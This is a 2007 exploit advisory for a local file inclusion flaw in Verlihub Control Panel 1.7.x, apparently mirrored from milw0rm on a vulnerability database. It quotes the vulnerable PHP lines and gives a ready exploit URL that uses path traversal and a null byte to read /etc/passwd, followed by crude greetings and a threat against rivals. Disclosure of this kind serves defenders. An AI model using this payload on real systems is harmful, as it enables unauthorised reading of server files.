Verlihub Control Panel <= 1.7.x Local File Inclusion Vulnerability

🗓️ 07 Oct 2007 00:00:00Reported by RootType

Verlihub Control Panel 1.7.x Local File Inclusion Vulnerability found by Methodman from TEAMELIT


                                                #####################################################################################
#Verlihub Control Panel v 1.7 PHP 4.x  Local File Inclusion
#http://vhcp.verlihub- project.org/
#
#Bug Found By Methodman
#From TEAMELITE &lt;-&gt; dchub.nemesis.te-home.net:4120
#####################################################################################
#Bug:
#Line: 27 - ini_set(&quot;magic_quotes_gpc&quot;,&quot;1&quot;); ............................ Line: 71 - $page_name =
#isset($_GET['page']) ? $_GET['page'] : (!isset($_SESSION['verliadmin']) ? 'start' : 'start'); .....Line: 145 - #require_once(&quot;./pages/$page_name.php&quot;);
#####################################################################################
#NEED: magic_quotes=OFF
#
#NEED: disable_functions=ini_set
#####################################################################################
#
#Exploit:
#
#http://site/path/?page=../../../../../../../../etc/passwd%00
#
#
##################################################################################### 
#
#Gr33tZ: To All Members Of TEAMELITE
#       Ashura,Lord_Zero,Meka][Meka,Ne0
#                  AND
#        My Friend  Elekt  From Antichat.
#####################################################################################    
#My 3N3mY ?: ...Mish and Dark If Y0u FUck w1t me,I'll pUt my f00t in y0ur aSs !...
#####################################################################################

# milw0rm.com [2007-10-07]

07 Oct 2007 00:00Current

7.1High risk

Vulners AI Score7.1

Verlihub Control Panel &lt;= 1.7.x Local File Inclusion Vulnerability

Verlihub Control Panel <= 1.7.x Local File Inclusion Vulnerability